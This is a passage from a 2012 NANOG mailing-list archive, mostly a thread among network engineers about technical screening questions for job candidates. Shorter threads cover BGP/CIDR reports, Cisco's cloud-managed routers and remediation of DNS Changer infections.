        204.9.116.0/22       AS30097 NUWAVE - NuWave
        204.10.88.0/21       AS3356  LEVEL3 Level 3 Communications
        204.10.92.0/23       AS30097 NUWAVE - NuWave
        204.10.94.0/23       AS30097 NUWAVE - NuWave
        204.14.0.0/21        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.0.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.2.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.3.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        205.175.214.0/24     AS5583  ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A.
        206.197.184.0/24     AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company
        207.174.131.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.132.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.152.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.154.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.155.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.200.0/24     AS22658 EARTHNET - Earthnet, Inc.
        207.174.248.0/21     AS6653  PRIVATEI - privateI, LLC
        207.231.96.0/19      AS11194 NUNETPA - NuNet Inc.
Please see http://www.cidr-report.org for the full report

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org


From cidr-report at potaroo.net  Fri Jul  6 17:04:32 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 6 Jul 2012 22:04:32 GMT
Subject: BGP Update Report
Message-ID: <201207062204.q66M4WIi029804@wattle.apnic.net>

BGP Update Report
Interval: 28-Jun-12 -to- 05-Jul-12 (7 days)
Observation Point: BGP Peering with AS131072

TOP 20 Unstable Origin AS

TOP 20 Unstable Origin AS (Updates per announced prefix)

TOP 20 Unstable Prefixes
12 - 62.76.150.0/24 3357 0.1% AS30812 -- MARSU-AS State Educational Institution of Higher Professional Education Mari State University 13 - 62.76.148.0/23 3355 0.1% AS30812 -- MARSU-AS State Educational Institution of Higher Professional Education Mari State University 14 - 59.177.144.0/20 3344 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 15 - 41.43.147.0/24 3341 0.1% AS8452 -- TE-AS TE-AS 16 - 193.235.148.0/22 3259 0.1% AS3 -- RU-RN-INFORM-NOGLIKI Limited Liability Company "RN-Inform" 17 - 59.177.64.0/18 3139 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 18 - 220.196.26.0/24 2822 0.1% AS17621 -- CNCGROUP-SH China Unicom Shanghai network 19 - 152.121.181.0/24 2766 0.1% AS27030 -- USCG-AS - United States Coast Guard 20 - 67.47.194.0/23 2637 0.1% AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From jlewis at lewis.org Fri Jul 6 23:00:32 2012 From: jlewis at lewis.org (Jon Lewis) Date: Sat, 7 Jul 2012 00:00:32 -0400 (EDT) Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Fri, 6 Jul 2012, George Herbert wrote: > If people don't bother to clean up the resume, either they don't > understand what's relevant now, or they don't care, or they're trying > to hide something. Or they want to show they've been doing it long enough that they have experience working with older gear younger people may not have even heard of. I have experience with Portmasters, Pipelines, and home built Linux multiport dialup PPP servers. None are relevant today. IMO, at least the latter demonstrates some skills. 
Rolling your own 80-port dialup server in 1995 wasn't just "yum install dialup-server" :) I don't mention Portmasters or Pipelines on my resume, but I do have Livingston and Ascend in the list of [many obsolete] router brands I have experience with. Is that really totally irrelevant now? ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From dedelman at iname.com Fri Jul 6 23:01:51 2012 From: dedelman at iname.com (David Edelman) Date: Sat, 07 Jul 2012 04:01:51 +0000 Subject: job screening question In-Reply-To: Message-ID: On 7/7/12 1:24 AM, "Jared Mauch" wrote: >Die proxy arp die. (and that's not German). > >I've had a job or consulting gig or two that has inadvertently had this >as the hidden glue making things work. > >(wha, you can't route that subnet out an Ethernet interface without a >next hop? It's always worked....) > >I fight with sysadmins to this day about the concept of a broadcast >domain and subnet... If I hear another case of someone saying that switch >is the "80" subnet when there are 3 co-existing /24s in that domain I may >go crazy.... > >I've cleaned up a lot of poor host and network management and it's >amazing how much a difference the hardware operates without the hacks. > >Jared Mauch > >On Jul 6, 2012, at 8:51 PM, Ben Aitchison wrote: > >> Routing loops, incorrect >> subnet masks. (like when people stick a /24 netmask on a /27 then >>can't reach another >> adjacent /27) > >We had a pair of diversely located systems operate for about 18 months >with misconfigured gateway addresses. Proxy ARP kept everything on an >even keel until one of the systems failed and the traffic routed to the >remaining system. 
I arrived on the call in time to hear the sys admins >saying that they had exceeded the maximum number of ARP entries and were >going to expand the table :( From mpalmer at hezmatt.org Fri Jul 6 23:06:58 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sat, 7 Jul 2012 14:06:58 +1000 Subject: job screening question In-Reply-To: <20120707005155.GA14111@meh.net.nz> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> Message-ID: <20120707040658.GC2221@hezmatt.org> On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: > On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: > > On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > --- jason at thebaughers.com wrote: > > > From: Jason Baugher > > > > > > Geez, I'd be happy to find someone with a good attitude, a solid work > > > ethic, and the desire and aptitude to learn. :) > > > --------------------------------------- > > > > > > > > > Yeah, that. But how do you get those folks through the HR > > > process to you, so you can decipher their skill/work ethic > > > level? What can the HR person ask to find out if someone > > > has these qualities? OSPF LSA type questions will not help. > > > > Don't get HR to do that sort of screening. They suck mightily at it. I > > lack any sort of HR department to get in the way, and I'm glad of it -- I > > don't see the value in having someone who doesn't know anything about the > > job get in the way of finding the right person for it. Sure, get 'em to do > > the scutwork of posting job ads, collating resumes, scheduling things and > > sending the "lolz no!" responses, but actually filtering? Nah, I'll do that > > bit thanks. If you have to have HR do a filter call, make it *really* > > simple, like "What does TCP stand for?" -- sadly, you'll still probably > > filter out half the applicants for a senior position... 
> > I've noticed a strong correlation between people who don't know what acronyms > stand for, and competence. People who don't know anything try and figure out > what the acronym stands for - people who want to understand things see it as > just a place holder. [...] > Maybe it's more significant to ask what the difference between TCP and UDP is. Yes, the difference between TCP and UDP is a much better question to ask, but having HR assess and act on the answer to the question is a whole hell of a lot harder. In many ways, *that's* the tough bit of finding a good screening question. Finding good interview questions *in general* isn't all that hard. With a good senior candidate my interview questions could just be bringing up problems I've recently solved or am currently wrestling with, and having a 30 minute conversation on the problem. I'll get a very good idea of someone's domain knowledge and problem-solving skills by doing that. But there's no way I can ask HR to do that, because they don't know how to assess the answer, and as previously demonstrated ("fragmented disks", indeed), you can't have HR act as scribe and relay the answer to you, because they'll get it wrong, and the interesting bit is the *conversation*, not the canned single-shot answer. That's my motivation for asking a question as inane as "What does TCP stand for?" -- it has an overwhelmingly obvious answer that can be verified in a second or two by someone who really doesn't know anything about what they're asking. Give a candidate 10 of those sorts of questions over the phone from an HR drone, if they score 8-or-better (for instance) they pass and you get to see their resume. That is, of course, assuming your organisation is so screwed up that they won't let you at candidates directly (which is still my preferred option -- leave HR to do the paperwork). 
- Matt -- The real art of conversation is not only to say the right thing at the right place but to leave unsaid the wrong thing at the tempting moment. -- Dorothy Nevill From owen at delong.com Fri Jul 6 23:20:03 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 6 Jul 2012 21:20:03 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <33C1956D-77FD-48A2-B493-1597438AE68A@delong.com> On Jul 6, 2012, at 9:06 PM, Matthew Palmer wrote: > On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: >> On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: >>> On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: >>>> --- jason at thebaughers.com wrote: >>>> From: Jason Baugher >>>> >>>> Geez, I'd be happy to find someone with a good attitude, a solid work >>>> ethic, and the desire and aptitude to learn. :) >>>> --------------------------------------- >>>> >>>> >>>> Yeah, that. But how do you get those folks through the HR >>>> process to you, so you can decipher their skill/work ethic >>>> level? What can the HR person ask to find out if someone >>>> has these qualities? OSPF LSA type questions will not help. >>> >>> Don't get HR to do that sort of screening. They suck mightily at it. I >>> lack any sort of HR department to get in the way, and I'm glad of it -- I >>> don't see the value in having someone who doesn't know anything about the >>> job get in the way of finding the right person for it. Sure, get 'em to do >>> the scutwork of posting job ads, collating resumes, scheduling things and >>> sending the "lolz no!" responses, but actually filtering? Nah, I'll do that >>> bit thanks. If you have to have HR do a filter call, make it *really* >>> simple, like "What does TCP stand for?" 
-- sadly, you'll still probably >>> filter out half the applicants for a senior position... >> >> I've noticed a strong correlation between people who don't know what acronyms >> stand for, and competence. People who don't know anything try and figure out >> what the acronym stands for - people who want to understand things see it as >> just a place holder. > > [...] > >> Maybe it's more significant to ask what the difference between TCP and UDP is. > > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. In many ways, *that's* the tough bit of finding a good > screening question. Finding good interview questions *in general* isn't all > that hard. With a good senior candidate my interview questions could just > be bringing up problems I've recently solved or am currently wrestling with, > and having a 30 minute conversation on the problem. I'll get a very good > idea of someone's domain knowledge and problem-solving skills by doing that. > But there's no way I can ask HR to do that, because they don't know how to > assess the answer, and as previously demonstrated ("fragmented disks", > indeed), you can't have HR act as scribe and relay the answer to you, > because they'll get it wrong, and the interesting bit is the *conversation*, > not the canned single-shot answer. Not so much, if you ask it in a slightly different way.... "If it isn't important that you get absolutely every packet, but it is vital that your packets be delivered without delay, would you prefer to use TCP or UDP?" HR can ask that. HR can easily evaluate the answer... TCP: Wrong, UDP: Right. Other interesting selections: Please choose either TCP or UDP (with a note to the potential interviewer that this person may be very creative, very smart or may simply have difficulty following directions) Spending a little time crafting the questions can pay tremendous dividends. 
> That's my motivation for asking a question as inane as "What does TCP stand > for?" -- it has an overwhelmingly obvious answer that can be verified in a > second or two by someone who really doesn't know anything about what they're > asking. Give a candidate 10 of those sorts of questions over the phone from > an HR drone, if they score 8-or-better (for instance) they pass and you get > to see their resume. That is, of course, assuming your organisation is so > screwed up that they won't let you at candidates directly (which is still my > preferred option -- leave HR to do the paperwork). I think there are better questions and ways to ask them that work even for HR than acronym memorization. I say this as one who could both correctly configure a router _AND_ probably score nearly 100% on the acronym test. Owen From sparctacus at gmail.com Fri Jul 6 23:25:55 2012 From: sparctacus at gmail.com (Bryan Irvine) Date: Fri, 6 Jul 2012 21:25:55 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <20120707042555.GA2272@hackbook.bozilla.net> On Sat, Jul 07, 2012 at 02:06:58PM +1000, Matthew Palmer wrote: > On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: > > On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: > > > On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > > --- jason at thebaughers.com wrote: > > > > From: Jason Baugher > > > > > > > > Geez, I'd be happy to find someone with a good attitude, a solid work > > > > ethic, and the desire and aptitude to learn. :) > > > > --------------------------------------- > > > > > > > > > > > > Yeah, that. But how do you get those folks through the HR > > > > process to you, so you can decipher their skill/work ethic > > > > level? 
What can the HR person ask to find out if someone > > > > has these qualities? OSPF LSA type questions will not help. > > > > > > Don't get HR to do that sort of screening. They suck mightily at it. I > > > lack any sort of HR department to get in the way, and I'm glad of it -- I > > > don't see the value in having someone who doesn't know anything about the > > > job get in the way of finding the right person for it. Sure, get 'em to do > > > the scutwork of posting job ads, collating resumes, scheduling things and > > > sending the "lolz no!" responses, but actually filtering? Nah, I'll do that > > > bit thanks. If you have to have HR do a filter call, make it *really* > > > simple, like "What does TCP stand for?" -- sadly, you'll still probably > > > filter out half the applicants for a senior position... > > > > I've noticed a strong correlation between people who don't know what acronyms > > stand for, and competence. People who don't know anything try and figure out > > what the acronym stands for - people who want to understand things see it as > > just a place holder. > > [...] > > > Maybe it's more significant to ask what the difference between TCP and UDP is. > > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. In many ways, *that's* the tough bit of finding a good > screening question. Indeed. I was once filtered out of a sysadmin job at a big search engine company. They asked questions like: What system call does the ls command make? I didn't know, but said you could read the source or strace to find out. They asked me to describe what ARP is. I basically talked about what an ARP table is and went into detail about "who-has" requests for building the table etc... and more questions like that. They seemed lost and didn't seem to know what I was talking about. It was at this point I realized that I was talking to an HR screener. 
The conversation was awkward from this point on as I struggled to attempt to guess what might be on the piece of paper as "The Right Answer". Needless to say I didn't hear back. Was I what they were looking for? Maybe, maybe not. But I was screened out before either of us could find out. Just as well, I'm much happier where I am now. :-) > Finding good interview questions *in general* isn't all > that hard. With a good senior candidate my interview questions could just > be bringing up problems I've recently solved or am currently wrestling with, > and having a 30 minute conversation on the problem. I'll get a very good > idea of someone's domain knowledge and problem-solving skills by doing that. > But there's no way I can ask HR to do that, because they don't know how to > assess the answer, and as previously demonstrated ("fragmented disks", > indeed), you can't have HR act as scribe and relay the answer to you, > because they'll get it wrong, and the interesting bit is the *conversation*, > not the canned single-shot answer. Definitely. I like the describe difference between UDP/TCP question. Another fave of mine is "Give me a list of various acronyms and its associated port" and give them HTTP/80 as an example. Many interviews end shortly after this one. > That's my motivation for asking a question as inane as "What does TCP stand > for?" -- it has an overwhelmingly obvious answer that can be verified in a > second or two by someone who really doesn't know anything about what they're > asking. Give a candidate 10 of those sorts of questions over the phone from > an HR drone, if they score 8-or-better (for instance) they pass and you get > to see their resume. That is, of course, assuming your organisation is so > screwed up that they won't let you at candidates directly (which is still my > preferred option -- leave HR to do the paperwork). 
+1 From jgreco at ns.sol.net Sat Jul 7 09:30:13 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Sat, 7 Jul 2012 09:30:13 -0500 (CDT) Subject: Cisco Update In-Reply-To: Message-ID: <201207071430.q67EUDjx019523@aurora.sol.net> > On 7/5/12, Joe Greco wrote: > > It'll get real interesting when Cisco's cloud database is breached and > > some weakness in the password encryption is discovered. > [snip] > > Will the users' passwords even matter, if a compromise of the > database allows an intruder to make a system-wide change to end users' > equipment, such as delivering a compromising configuration change, or > a "patched" firmware update that deactivates cloud service and > turns them all into botnet nodes under exclusive control of the > compromiser ? > > Hopefully Cisco thought that stuff out, but password encryption > weaknesses at least are easily addressed by forcing all users to reset > pw, and requiring a proof of physical access to the unit. "and requiring a proof of physical access to the unit"? Yeah, sure, that seems likely. No, really, how bad an idea can it be to have a central database and a system that's allowed to remotely log in, configure, and update thousands of Internet-connected CPE? I mean, talk about making an attractive target. Compromise this one system and gain access to create a huge botnet. Complete list of CPE addresses and access credentials in one juicy bundle. How is it that NANOG can see this with no trouble but Cisco cannot? What's stunningly clear is that Cisco did NOT think that stuff out. You want content filtering? Boring. Been done for years, without "cloud" features. You want remote management? Boring. Been done for years, just look at DD-WRT et.al. You want configuration backup and restore? Still boring. Could have figured a slick method to do THAT "to the cloud", as an option, with per-account encryption, or config backup to local PC, or both. Automatic firmware updates? Hey, effin' great! 
I heartily approve of THAT idea, even of defaulting it to on. Just make sure I can also turn it off. "Forced" upgrades are not acceptable. Requiring an upgrade to happen over the public Internet is not acceptable. Make sure we have the option to upgrade manually from a local firmware file. So is a user locked out of administering the router unless it can talk to the cloud? If so, that's boneheaded in the extreme. Hey, Cisco, when my DSL with static IP finally dies and I need to switch to a provider that uses DHCP, how am I supposed to log in to my router since it can not connect to your glorious cloud? And the onerous puritanical TOS? Find and fire whoever came up with that. That's just a complete load. Did you sign an agreement not to watch porno DVD's when you bought your DVD player? It's *equipment*, Cisco. Some people will invariably use it for purposes you find to be objectionable. Geez. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From jra at baylink.com Sat Jul 7 12:31:24 2012 From: jra at baylink.com (Jay Ashworth) Date: Sat, 7 Jul 2012 13:31:24 -0400 (EDT) Subject: DNS Changer items In-Reply-To: <4FF7251A.2040003@rollernet.us> Message-ID: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Seth Mattinen" > > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: > >> The dns-ok.us site is getting crushed from all the sudden media > >> interest. > > > > One wonders why it's so hard to get the media interested when it > > would be *helpful*. DNS Changer gets traction like 3 days before the > > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > > to give to regionals, etc... 
> > Reactive is easier to justify to the powers that be than proactive. It's easier to justify *not* being smart enough to deal with the problem when it doesn't cause a major disruption? Have we venerated stupidity *that deeply* in the US? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jcdill.lists at gmail.com Sat Jul 7 13:01:29 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Sat, 07 Jul 2012 11:01:29 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <4FF87979.3010308@gmail.com> On 06/07/12 9:06 PM, Matthew Palmer wrote: >> Maybe it's more significant to ask what the difference between TCP and UDP is. > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. The best path is to have HR report the answer verbatim for the hiring manager to do the assessing. Then the hiring manager can decide which candidates proceed to the next level of interviews. 
jc From mpalmer at hezmatt.org Sat Jul 7 13:13:19 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sun, 8 Jul 2012 04:13:19 +1000 Subject: job screening question In-Reply-To: <4FF87979.3010308@gmail.com> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> Message-ID: <20120707181318.GF2221@hezmatt.org> On Sat, Jul 07, 2012 at 11:01:29AM -0700, JC Dill wrote: > On 06/07/12 9:06 PM, Matthew Palmer wrote: > >>Maybe it's more significant to ask what the difference between TCP and UDP is. > >Yes, the difference between TCP and UDP is a much better question to ask, > >but having HR assess and act on the answer to the question is a whole hell > >of a lot harder. > > The best path is to have HR report the answer verbatim for the > hiring manager to do the assessing. Then the hiring manager can > decide which candidates proceed to the next level of interviews. Two problems there: * We've already had mention made in this thread of the problems associated with HR attempting to record, verbatim, an answer provided by a candidate. Unless all your HR phone screeners are experienced stenographers (who, I will note, can typically command salaries far in excess of HR associates), their chances of getting an accurate record of a candidate's statements is slim. * If you're going to have to carefully examine each candidate's answers *anyway*, why not just get on the phone screen with them in the first place, and get HR out of the picture? At least that way you're not wasting money paying for HR people, and you can do a far more in-depth interview because you're there, in real-time, to ask follow-up questions. - Matt -- MySQL seems to be the Windows of the database world. Broken, underspecced, and mainly only popular due to inertia and people who don't really know what they're doing. 
-- Peter Corlett, in the Monastery

From george.herbert at gmail.com Sat Jul 7 13:30:25 2012
From: george.herbert at gmail.com (George Herbert)
Date: Sat, 7 Jul 2012 11:30:25 -0700
Subject: job screening question
In-Reply-To: <20120707181318.GF2221@hezmatt.org>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org>
Message-ID: <31F1F3F6-EC50-4931-90F0-D90FE8D512CB@gmail.com>

On Jul 7, 2012, at 11:13 AM, Matthew Palmer wrote:

> On Sat, Jul 07, 2012 at 11:01:29AM -0700, JC Dill wrote:
>> On 06/07/12 9:06 PM, Matthew Palmer wrote:
>>>> Maybe it's more significant to ask what the difference between TCP and UDP is.
>>> Yes, the difference between TCP and UDP is a much better question to ask,
>>> but having HR assess and act on the answer to the question is a whole hell
>>> of a lot harder.
>>
>> The best path is to have HR report the answer verbatim for the
>> hiring manager to do the assessing. Then the hiring manager can
>> decide which candidates proceed to the next level of interviews.
>
> Two problems there:
>
> * We've already had mention made in this thread of the problems associated
>   with HR attempting to record, verbatim, an answer provided by a candidate.
>   Unless all your HR phone screeners are experienced stenographers (who, I
>   will note, can typically command salaries far in excess of HR associates),
>   their chances of getting an accurate record of a candidate's statements is
>   slim.
>
> * If you're going to have to carefully examine each candidate's answers
>   *anyway*, why not just get on the phone screen with them in the first
>   place, and get HR out of the picture? At least that way you're not
>   wasting money paying for HR people, and you can do a far more in-depth
>   interview because you're there, in real-time, to ask follow-up questions.
>
> - Matt

Yeah.
We tried "write down verbatim" - epic fail.

This was why we spent man-months of top level consultant time coming up with (and fixing and evolving) lists of twentyish questions per discipline with only one right answer and an answer the recruiter could tell was right or not.

It's not easy. If you screen a thousand plus people a year it's a super win. If you screen ten or twenty you may just want your techie interviewer to do the short screen rather than figure out how the recruiter can.

George William Herbert
Sent from my iPhone

From bill at herrin.us Sat Jul 7 13:33:10 2012
From: bill at herrin.us (William Herrin)
Date: Sat, 7 Jul 2012 14:33:10 -0400
Subject: job screening question
In-Reply-To: <20120707181318.GF2221@hezmatt.org>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org>
Message-ID:

On Sat, Jul 7, 2012 at 2:13 PM, Matthew Palmer wrote:
> * If you're going to have to carefully examine each candidate's answers
>   *anyway*, why not just get on the phone screen with them in the first
>   place, and get HR out of the picture? At least that way you're not
>   wasting money paying for HR people, and you can do a far more in-depth
>   interview because you're there, in real-time, to ask follow-up questions.

I don't know about you but my brain doesn't switch on a dime. I have to *prepare* to conduct a phone interview. And afterward I have to spool back up on whatever task I was working on. If a screening question can cut many candidates who I'll know in 5 minutes aren't the one, that saves me a lot more time than just the 5 minutes on the phone.

Plus, frankly, I don't enjoy conducting interviews. It's necessary but I find it stressful. Where I can avoid it with minimal risk of missing the individual I actually want to hire, that makes me happy.

Regards,
Bill Herrin

--
William D.
Herrin ................ herrin at dirtside.com  bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From mysidia at gmail.com Sat Jul 7 17:58:26 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sat, 7 Jul 2012 17:58:26 -0500
Subject: job screening question
In-Reply-To: <20120707181318.GF2221@hezmatt.org>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org>
Message-ID:

On 7/7/12, Matthew Palmer wrote:
> * We've already had mention made in this thread of the problems associated
>   with HR attempting to record, verbatim, an answer provided by a candidate.
[snip]

Conversation should be recorded, then they don't have to write out the full text :)

Asking an HR agent to vet a candidate's technical credentials, beyond verification of identity/history/certs, is like asking a blind person to administer a vision test. Possibly it can be done, but only within a very rigid framework requiring very little flexibility or knowledge from the test administrator.

The HR agent should make it clear that the question is a screening question, to be answered as-is to their ability, and a short easily-recordable answer is expected.

The ideal screening question should be either presented as multiple choice, or a question where a one word or one-sentence answer is expected. That can be written down very easily, and correctness/incorrectness should be obvious. Instead of asking for a definition of TCP, provide the definition, and ask for the one word or one number answer.

"When a number received in an IP packet is presented in network byte order, and the host architecture is big endian, what must be done to convert the number into host byte order?"
(one word answer)

"What commonly used protocol uses IP datagrams to provide a reliable transport?"
(one word answer)

"What IP protocol number has IANA assigned protocol number 1 to?"
(one word answer)

"The TCP/UDP port numbers below what number are considered well-known, and can only be bound by administrative users?"
(one number answer)

"What version of the IP datagram protocol is most widely deployed?"
(one number answer)

"How many bits are there in an IPv4 address?"
(one two-digit number answer)

"Host bits in an IPv4 address correspond to the bits in the network mask set to what value?"
(one single-digit number answer)

"Is 192.168.0.256 a valid IP address for a host on a private intranet?"
(one yes/no answer)

"Is 172.16.12.3 ?"
(one yes/no answer)

"What's the problem with using 255.255.255.247 as a subnet mask if you want to make a LAN subnet with 12 hosts?"
(5 word answer)

"What TCP header flag should be set on the first packet sent by a connection initiator as part of a 3-way handshake?"
(one word answer)

"What TCP destination port numbers should be allowed through the perimeter stateful firewall device to and from a mail server whose only purpose is to proxy SMTP mail from internal sources?"
(one number answer)

....

--
-JH

From cb.list6 at gmail.com Sat Jul 7 19:10:59 2012
From: cb.list6 at gmail.com (Cameron Byrne)
Date: Sat, 7 Jul 2012 17:10:59 -0700
Subject: Running your own DNSchanger proxies
Message-ID:

On the other thread I read that some ISPs are running their own proxies for infected hosts.

That sounded interesting, so I googled around to find out how to do that and I could not find a HOWTO, so I imagined up a solution myself, tested it in VirtualBox, and wrote it down in case anyone finds it useful or has another approach

https://sites.google.com/site/cbyrne/dnschanger

I don't plan to use this solution, but it was interesting to think about and may be a good starting point in the unlikely event that some VP pushes the panic button on Monday.
CB

From kmedcalf at dessus.com Sat Jul 7 19:44:11 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Sat, 07 Jul 2012 18:44:11 -0600
Subject: job screening question
In-Reply-To:
Message-ID: <6287cebd84702948aa393809d67e39e0@mail.dessus.com>

> "What's the problem with using 255.255.255.247 as a subnet mask if you
> want to make a LAN subnet with 12 hosts?"
> (5 word answer)

Unemployment Office Is That Way ->

Is the only 5 word answer I could come up with. The correct answer, "invalid netmask", is only two words.

> "What TCP destination port numbers should be allowed through the
> perimeter stateful firewall device to and from a mail server whose
> only purpose is to proxy SMTP mail from internal sources?"
> (one number answer)

Short Answer: There is no answer to the question that can be expressed in one number.

Outbound connections to TCP destination port 25 only. Returning traffic (including associated ICMP) should be automatically handled by your stateful inspection firewall. If not, you need to buy a better firewall.

Any applicant who provides any answer should be rejected out of hand as (a) being unable to read (b) being a threat to security. Unless, of course, you have misphrased the question.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From randy_94108 at yahoo.com Sat Jul 7 20:03:43 2012
From: randy_94108 at yahoo.com (Randy)
Date: Sat, 7 Jul 2012 18:03:43 -0700 (PDT)
Subject: job screening question
In-Reply-To:
Message-ID: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com>

....
> "When a number received in an IP packet is presented in network byte
> order, and the host architecture is big endian, what must be done to
> convert the number into host byte order?"
> (one word answer)

My response would be to have a field-day with HR talking about MSB and LSB. Certainly wouldn't be a one-word answer. So HR disqualifies me?
> "What's the problem with using 255.255.255.247 as a subnet mask if you
> want to make a LAN subnet with 12 hosts?"
> (5 word answer)

My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. If you so desire, give me about 2 hours since I do not have a scientific calculator handy; and I will get back to you with the complete list. Definitely not 5 words as required from the HR standpoint. So I get disqualified again!

./Randy

From jason.duerstock at gallaudet.edu Sat Jul 7 20:13:58 2012
From: jason.duerstock at gallaudet.edu (Jason Duerstock)
Date: Sat, 7 Jul 2012 21:13:58 -0400
Subject: Running your own DNSchanger proxies
In-Reply-To:
References:
Message-ID:

As an intellectual exercise, I think this is interesting and worth the effort. As an actual implementation, I think it's more effective to block DNS traffic to the affected subnets. Let the breakage occur, and then let the end users get their broken machines fixed rather than let them continue hobbling along with this hack in place.

Jason

On Sat, Jul 7, 2012 at 8:10 PM, Cameron Byrne wrote:
> On the other thread i read that some ISP are running their own proxies
> for infected host.
>
> That sounded interesting, so i googled around to find out how to do
> that and i could not find a HOWTO, so imagined up a solution myself,
> tested it in VirtualBox, and wrote it down in case anyone finds it
> useful or has another approach
>
> https://sites.google.com/site/cbyrne/dnschanger
>
> I don't plan to use this solution, but it was interesting to think
> about and may be a good starting point in the unlikely event that some
> VP pushes the panic button on Monday.
>
> CB
>

From valdis.kletnieks at vt.edu Sat Jul 7 20:16:28 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Sat, 07 Jul 2012 21:16:28 -0400
